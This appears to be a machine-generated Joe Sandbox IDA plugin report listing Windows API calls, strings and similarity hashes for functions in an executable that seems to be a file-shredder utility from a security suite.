                                • GetCurrentProcess.KERNEL32 ref: 0043E1FE
                                • _memset.LIBCMT ref: 0043E232
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
                                • WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270
                                  • Part of subcall function 0043DBB0: GetSystemDirectoryW.KERNEL32(?,00000103), ref: 0043DBBF
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA3B
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemDrive%,?,00000103), ref: 0043DA5A
                                  • Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DA75
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA9F
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000103), ref: 0043DAB8
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DAC2
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DADF
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%,?,00000103), ref: 0043DAF8
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB02
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DB1F
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000103), ref: 0043DB38
                                  • Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DB5A
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB73
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(windir,?), ref: 0043DC3A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemRoot,?), ref: 0043DC42
                                  • Part of subcall function 0043DC10: _memset.LIBCMT ref: 0043DC5A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(ComSpec,?), ref: 0043DD0A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemDrive,?), ref: 0043DD21
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Environment_memset$ExpandStringsVariable$__wcsicoll$__wcsnicmp$CurrentDirectoryFileInformationModuleNameProcessQuerySessionSystem
                                • String ID:
                                • API String ID: 3875749331-0
                                • Opcode ID: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
                                • Instruction ID: efeaf43171ea69977cfcb36080cd1cd6059f6c5ca92097290a5c2233e868a2ad
                                • Opcode Fuzzy Hash: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
                                • Instruction Fuzzy Hash: 43314B719012189ADB20EF519C45BEF73ADAF4C704F0011EEB904672C2DA795E95CB9D
                                APIs
                                • GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • HeapLock.KERNEL32(00000000), ref: 0047A24E
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A268
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A29C
                                • HeapUnlock.KERNEL32(00000000), ref: 0047A2CF
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Walk$LockProcessUnlock
                                • String ID:
                                • API String ID: 2227978497-0
                                • Opcode ID: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
                                • Instruction ID: 30f15de8d54f4eeb7fec28a7866d4a092ff4021abed2c4903b3fa11efb473330
                                • Opcode Fuzzy Hash: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
                                • Instruction Fuzzy Hash: 8321E0751093419FD315CF28E884B9FB7E8EB85720F40863EF80192391D73A9849CBAB
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 004602AB
                                • EnterCriticalSection.KERNEL32(?), ref: 004602BF
                                • LeaveCriticalSection.KERNEL32(?), ref: 004602D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                • String ID: FileSmasher\historydlg.xml$IDS_NO_DATA
                                • API String ID: 2351996187-3197532833
                                • Opcode ID: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
                                • Instruction ID: 028c4074a9e95867e078abe2bb7ba8bf10d6841b7c620acf430e1bf6beca8d12
                                • Opcode Fuzzy Hash: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
                                • Instruction Fuzzy Hash: AEB1A4712083419FE710DB65CC41B5B77E8AF89704F14461EFA45AB2C2DB78ED05CB9A
                                APIs
                                • GetWindowLongW.USER32(?,000000F0), ref: 004822FD
                                • GetParent.USER32(?), ref: 0048230B
                                • GetParent.USER32(?), ref: 0048231E
                                • GetLastActivePopup.USER32(?), ref: 0048232F
                                • IsWindowEnabled.USER32(?), ref: 00482343
                                • EnableWindow.USER32(?,00000000), ref: 00482356
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                • String ID:
                                • API String ID: 670545878-0
                                • Opcode ID: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
                                • Instruction ID: 9615c52491f184c7a1cfc2fb0684b042f474b33139c70dd3ec826485e9417237
                                • Opcode Fuzzy Hash: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
                                • Instruction Fuzzy Hash: 19118F32601221A7CB323A799B54B6F729C6F55B64F150A66ED04E7340DBBCCC0293AD
                                APIs
                                • GetDC.USER32(00000000), ref: 004401E9
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004401F4
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440200
                                • ReleaseDC.USER32(00000000,00000000), ref: 0044020C
                                • MulDiv.KERNEL32(00000000,00000000,000009EC), ref: 00440224
                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00440235
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
                                • Instruction ID: 462b78027e15ed6f0a95b7f2c6649df6c4f76bdb0fb576b7a7b5105730ddadd1
                                • Opcode Fuzzy Hash: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
                                • Instruction Fuzzy Hash: 45F01D75A41214BFE710EFA8DC4AE5E7FBCEB19712F004269FA04A7280DA709D04CFA5
                                APIs
                                • GetDC.USER32(00000000), ref: 00440189
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00440194
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004401A0
                                • ReleaseDC.USER32(00000000,00000000), ref: 004401AC
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 004401C4
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 004401D5
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
                                • Instruction ID: f3264cfd38ec8464efa8f621742a40a0c44e9e0a9f33fa74384ab9390e35c0af
                                • Opcode Fuzzy Hash: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
                                • Instruction Fuzzy Hash: 42F01D75A41214BFE700EFA8DC4AF6E7BBCEB19712F004269FA0497280DAB05D04CFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset
                                • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                • API String ID: 2102423945-1093365818
                                APIs
                                  • Part of subcall function 00444EA0: InitializeCriticalSection.KERNEL32(0000002C,1D1D1D8C,0000002C,00000000,00000000,000000FE), ref: 00444EDB
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00444BB6
                                  • Part of subcall function 00444F70: lstrlenW.KERNEL32(?,?,0044261D,00000000,00000001), ref: 00444F74
                                  • Part of subcall function 00444F70: _memcpy_s.LIBCMT ref: 00444F8B
                                • lstrlenW.KERNEL32(?), ref: 00444C37
                                  • Part of subcall function 00444E30: EnterCriticalSection.KERNEL32(004C17A0,00000000,?,00000000,00444B51), ref: 00444E3F
                                  • Part of subcall function 00444E30: LeaveCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E4E
                                  • Part of subcall function 00444E30: DeleteCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E5F
                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00444B32
                                  • Part of subcall function 004451A0: EnterCriticalSection.KERNEL32(?,1D1D1D8C,00000000,?,00000000,?,004AE3A8,000000FF,?,00444C6C), ref: 004451D9
                                  • Part of subcall function 004451A0: LeaveCriticalSection.KERNEL32(?,?,00000000,lLD,?,00444C6C), ref: 004451F8
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeaveModulelstrlen$DeleteFileHandleInitializeName_memcpy_s
                                • String ID: Module$Module_Raw
                                • API String ID: 1810964915-3885325121
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E8F9
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E914
                                • DeleteFileW.KERNEL32(00000000,00000060,?,?,?,?,?), ref: 0042E9DD
                                Strings
                                Similarity
                                • API ID: GdipImage$DeleteFileHeightWidth
                                • String ID: `$disable_resize
                                • API String ID: 3141775222-3937757610
                                APIs
                                • RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
                                • RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
                                • RegCloseKey.ADVAPI32 ref: 0047C1EA
                                Strings
                                • Path, xrefs: 0047C1CA
                                • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe, xrefs: 0047C19E
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe
                                • API String ID: 3677997916-3679634941
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?,?,?,?,00000000,00000002,00474F20,?,?,?,?,?,?,?,?), ref: 00476429
                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 004764B9
                                • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 004764D5
                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00476561
                                Similarity
                                • API ID: File$Pointer$ReadSize
                                • String ID:
                                • API String ID: 1971422761-0
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EB77
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EB8E
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EBD2
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0042EC4A
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                APIs
                                • GetModuleHandleW.KERNEL32 ref: 0044E5A8
                                • _memset.LIBCMT ref: 0044E5C6
                                • GetCurrentProcessId.KERNEL32 ref: 0044E5D2
                                  • Part of subcall function 0044D7A0: CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000,?), ref: 0044D7C2
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0044E60D
                                • LoadLibraryW.KERNEL32 ref: 0044E622
                                Similarity
                                • API ID: FileModule$CreateCurrentHandleLibraryLoadNameProcess_memset
                                • String ID:
                                • API String ID: 2606892308-0
                                APIs
                                • EnterCriticalSection.KERNEL32(004E40A8,004AA8C9,?,00001000,?,00000000,00001000), ref: 004AA475
                                • LeaveCriticalSection.KERNEL32(004E40A8,?,?,004E4028), ref: 004AA49D
                                • LeaveCriticalSection.KERNEL32(004E40A8,?), ref: 004AA4F1
                                Strings
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: (@N
                                • API String ID: 2978645861-2818764248
                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,0043D612), ref: 0044460D
                                • GetCurrentThreadId.KERNEL32 ref: 00444613
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044463F
                                • LeaveCriticalSection.KERNEL32(?), ref: 00444653
                                • LeaveCriticalSection.KERNEL32(?), ref: 00444667
                                Similarity
                                • API ID: CriticalSection$Leave$CurrentEnterThread
                                • String ID:
                                • API String ID: 2905768538-0
                                APIs
                                • __getptd.LIBCMT ref: 004924F7
                                  • Part of subcall function 00493E12: __getptd_noexit.LIBCMT ref: 00493E15
                                  • Part of subcall function 00493E12: __amsg_exit.LIBCMT ref: 00493E22
                                • __amsg_exit.LIBCMT ref: 00492517
                                • __lock.LIBCMT ref: 00492527
                                • InterlockedDecrement.KERNEL32(?), ref: 00492544
                                • InterlockedIncrement.KERNEL32(004DBFA0), ref: 0049256F
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                • String ID:
                                • API String ID: 4271482742-0
                                APIs
                                • __lock.LIBCMT ref: 0048C87E
                                  • Part of subcall function 00498F22: __mtinitlocknum.LIBCMT ref: 00498F38
                                  • Part of subcall function 00498F22: __amsg_exit.LIBCMT ref: 00498F44
                                  • Part of subcall function 00498F22: EnterCriticalSection.KERNEL32(?,?,?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001), ref: 00498F4C
                                • ___sbh_find_block.LIBCMT ref: 0048C889
                                • ___sbh_free_block.LIBCMT ref: 0048C898
                                • HeapFree.KERNEL32(00000000,00000104,004CCF20,0000000C,00498F03,00000000,004CD298,0000000C,00498F3D,00000104,?,?,0049F87E,00000004,004CD540,0000000C), ref: 0048C8C8
                                • GetLastError.KERNEL32(?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001,00000214), ref: 0048C8D9
                                Similarity
                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                • String ID:
                                • API String ID: 2714421763-0
                                APIs
                                • IsWindow.USER32(?), ref: 0045E975
                                • OpenMutexW.KERNEL32(001F0001,00000000,?,?,00465868), ref: 0045E992
                                • GetLastError.KERNEL32(?,00465868), ref: 0045E99C
                                • CloseHandle.KERNEL32(00000000,?,00465868), ref: 0045E9BC
                                • DestroyWindow.USER32(?,?,00465868), ref: 0045E9C6
                                Similarity
                                • API ID: Window$CloseDestroyErrorHandleLastMutexOpen
                                • String ID:
                                • API String ID: 1468468148-0
                                • Opcode ID: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
                                • Instruction ID: 33dab0c8709179d15137cc52d378e2cfd7b9d0d142e94031476c919a29004ac5
                                • Opcode Fuzzy Hash: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
                                • Instruction Fuzzy Hash: 6FF030B1600700DFD7689B75D94DB6777EDBB44702F544A2DF842C6691CB78E804CB18
                                APIs
                                • _memset.LIBCMT ref: 004723DE
                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 004723FE
                                Strings
                                Similarity
                                • API ID: FullNamePath_memset
                                • String ID: \..\$j)F
                                • API String ID: 2554471374-2307207292
                                • Opcode ID: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
                                • Instruction ID: d9fcb76202b8c92c2036ff5ccb9d87a47571da3a3f785901b21d90a2ee1cc94f
                                • Opcode Fuzzy Hash: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
                                • Instruction Fuzzy Hash: 8D12BF719012159FCB21EB68CD85BDEB3B0AF84314F1482DAE41D67281DB78AF85CB99
                                APIs
                                • ShowWindow.USER32(?,00000001,?,00000000,00000000,8600C000,00010100,00000000,?), ref: 00466761
                                Strings
                                Similarity
                                • API ID: ShowWindow
                                • String ID: IDS_DATE_TIME_FMT$T9N$T9N
                                • API String ID: 1268545403-4252793494
                                • Opcode ID: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
                                • Instruction ID: 6e9d00e1c43c49f898589a134176e963eef41d57f069eba1c746a3cb215e7b45
                                • Opcode Fuzzy Hash: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
                                • Instruction Fuzzy Hash: E7E1A3709002159FDB14DF68CC85B9EB7B4EF44314F1582EAE419AB392DB38AE84CF95
                                APIs
                                • CopyRect.USER32(?,?), ref: 00434C80
                                • OffsetRect.USER32(?,00000000,?), ref: 00434CB3
                                Strings
                                Similarity
                                • API ID: Rect$CopyOffset
                                • String ID: 9JC
                                • API String ID: 2534530997-834187432
                                • Opcode ID: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
                                • Instruction ID: 9b066e3f8fdced23daec9e69e548ea301ea4f196c710a7fa38ee4cd0e35d0dd2
                                • Opcode Fuzzy Hash: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
                                • Instruction Fuzzy Hash: 5CC17071A01209DFDB10DF98C880AEEB7B9FF89304F24915EE505AB341C779AE45CBA5
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 0043A24F
                                  • Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A
                                Strings
                                Similarity
                                • API ID: ExceptionException@8RaiseThrow
                                • String ID: H3K$H3K$invalid map/set<T> iterator
                                • API String ID: 3976011213-2057606363
                                • Opcode ID: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
                                • Instruction ID: 9317064ab4661ae0508ddb319b9aa231e58ca3e46406a00c9d616f5597bee9ca
                                • Opcode Fuzzy Hash: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
                                • Instruction Fuzzy Hash: 87C1A2709442409FDB51CF15C0C4B5ABBA1AF59318F68E08ED8854F392C3BAEC96CF96
                                APIs
                                • GetModuleHandleA.KERNEL32(KERNEL32,00490CB1), ref: 0049E5FE
                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0049E60E
                                Strings
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                • API String ID: 1646373207-3105848591
                                • Opcode ID: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
                                • Instruction ID: 5d59013588b00adf7d0845515ba78f042050767efe60ab05ea6d9b7fb8e80628
                                • Opcode Fuzzy Hash: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
                                • Instruction Fuzzy Hash: 0AF01D20A00A09E2DF106BA2BC0A7AF7E79FB80746F9205A1E1A5A0185DF758475D69A
                                APIs
                                • SysAllocString.OLEAUT32(yes), ref: 0043C1DA
                                • VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 0043C1F0
                                • SysFreeString.OLEAUT32(00000000), ref: 0043C1FC
                                Strings
                                Similarity
                                • API ID: String$AllocBstrFree
                                • String ID: yes
                                • API String ID: 359749342-1978086825
                                • Opcode ID: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
                                • Instruction ID: e600b2d09dd7dddf48b1386afc47337d7b0e41dd9a9f86ff21ded1716e6caa0a
                                • Opcode Fuzzy Hash: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
                                • Instruction Fuzzy Hash: 1FE0C2321812247FD1105B6A9C99FD73B9CDF46AA0F004116F60487180C9769800C6B8
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047668C
                                • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047672B
                                • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 00476747
                                • _memset.LIBCMT ref: 004767EE
                                Similarity
                                • API ID: File$PointerReadSize_memset
                                • String ID:
                                • API String ID: 1834740430-0
                                • Opcode ID: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
                                • Instruction ID: 6151f60ee9c84707b86d9a20b60ccc22e606c985d082c452e23b09b8a49b0afc
                                • Opcode Fuzzy Hash: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
                                • Instruction Fuzzy Hash: A551AE716047009FD314DE29D880BABB7E5FB88354F55892EF88DD7340EB38E9458B9A
                                APIs
                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 004800F8
                                • ColorHLSToRGB.SHLWAPI(000000EF,000000F0,000000F0), ref: 004801FD
                                • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 00480213
                                • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 0048022B
                                Similarity
                                • API ID: Color
                                • String ID:
                                • API String ID: 2811717613-0
                                • Opcode ID: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
                                • Instruction ID: 629a250e4147ac8ac128a20f7a24bcb4b596a5fad59d93fec3449513787912b9
                                • Opcode Fuzzy Hash: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
                                • Instruction Fuzzy Hash: E441797051C3A18BD3448F1A885403FBAE5FBC8715F404E1EF8D9A2295E33CC698DBA6
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,1D1D1D8C), ref: 0044A81C
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0044A82F
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0044A867
                                • CloseHandle.KERNEL32(00000000), ref: 0044A8E8
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
